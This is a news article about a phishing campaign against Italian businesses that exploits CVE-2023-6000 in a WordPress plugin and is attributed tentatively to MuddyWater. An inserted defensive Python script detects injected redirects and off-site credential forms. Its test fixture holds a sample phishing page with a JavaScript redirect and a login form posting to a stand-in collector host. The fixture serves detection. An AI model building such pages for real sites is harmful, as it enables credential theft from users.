
Security alert: sophisticated phishing campaign hits Italy

An in-depth analysis reveals the advanced techniques of a cyber attack linked to Iranian entities, alarming Italian companies

In Italy, a sophisticated phishing campaign, with possible Iranian origins, targets businesses via deceptive emails leading to a malicious link. Advanced techniques such as Persistent XSS are used to steal personal data, prompting caution and security updates.


In Italy, considerable malicious activity has been recorded in the form of a particularly sophisticated phishing campaign of alleged Iranian origin. The attack, which primarily targets local businesses, uses sophisticated techniques to bypass common security systems. Experts from the Red Hot Cyber team, including professionals who wish to remain anonymous, together with the well-known penetration tester Davide Cavallini, have examined the distinctive elements of this campaign. The emails appear harmless and are written in impeccable Italian, but they actually hide a malicious link which, disguised as an urgent request, leads victims to click without realising it.

Technical analysis reveals the trap

Deepening the investigation, the technicians, alerted by an anomalous redirection performed through JavaScript, discovered the use of an advanced phishing technique identified as Persistent XSS. The target of this manipulation was a falsified document simulating a password-protected order. This ingenious ploy exploits a vulnerability reported as CVE-2023-6000 in the Popup Builder plugin. The personal data entered was unknowingly sent to a WordPress server in Iran, highlighting the potential involvement of Iranian actors in orchestrating the attack.
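The two indicators the analysts describe above, an injected JavaScript redirect and a credential form that sends its data off-site, can be checked for mechanically when triaging a suspicious page. The following is an added example, not code from the article or from Red Hot Cyber; the HTML sample and all hostnames are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample (not from the article): an injected inline script that redirects to a
# look-alike "order" page, and a login form that posts the credentials to yet another host.
SAMPLE_HTML = """<html><body>
<script>window.location.href = "https://orders-verify.example.net/order.html";</script>
<form action="https://collector.example.org/wp-admin/admin-ajax.php" method="post">
  <input name="user" type="text"><input name="pass" type="password">
</form></body></html>"""

# JavaScript navigation sinks: location = ..., location.href = ..., location.replace()/assign()
REDIRECT_RE = re.compile(r"""(?:location(?:\.href)?\s*=|location\.(?:replace|assign)\()\s*["']([^"']+)["']""")

class _Collector(HTMLParser):
    # Gathers inline <script> bodies and <form>s (action URL + whether a password field is present).
    def __init__(self):
        super().__init__()
        self.scripts, self.forms, self._in_script, self._form = [], [], False, None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and "src" not in a:
            self._in_script = True
        elif tag == "form":
            self._form = {"action": a.get("action") or "", "password": False}
        elif tag == "input" and self._form and (a.get("type") or "").lower() == "password":
            self._form["password"] = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
        elif tag == "form" and self._form:
            self.forms.append(self._form)
            self._form = None
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def _leaves_origin(url, page_host):
    host = urlparse(url).hostname          # None for relative URLs, which stay on-site
    return host is not None and host.lower() != page_host.lower()

def triage(html, page_host):
    """Return (finding, external_host) pairs for JS redirects and credential forms leaving the site."""
    p = _Collector(); p.feed(html); p.close()
    hits = [("js_redirect", urlparse(u).hostname)
            for s in p.scripts for u in REDIRECT_RE.findall(s) if _leaves_origin(u, page_host)]
    hits += [("cross_origin_credential_form", urlparse(f["action"]).hostname)
             for f in p.forms if f["password"] and _leaves_origin(f["action"], page_host)]
    return hits
```

Running `triage(SAMPLE_HTML, "shop.example.com")` flags both the redirect host and the collector host; a relative form action or a same-host redirect produces no finding.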

Protection from online dangers: practical advice

Faced with such threats, it is essential to take preventive measures to safeguard online security. End users should receive ongoing training so that they can recognise suspicious emails and links, and should keep their antivirus and anti-malware solutions up to date. Website owners, for their part, must keep their systems, including plugins and libraries, up to date to prevent exploitation of known vulnerabilities.

Potential involvement of APT MuddyWater

Following the shared analysis, and thanks to collaboration within the cybersecurity sector, the suspicion has arisen that MuddyWater, a well-known Iranian APT group, may be behind this phishing campaign. The group, active since 2017, is known for its cyber espionage activity and has already shown an interest in targets located not only in the Middle East but also in other regions. It will be of primary importance to keep monitoring the development of this campaign and, where necessary, adopt new defensive measures to deal with these increasingly sophisticated threats.


03/30/2024 14:18

Marco Verro
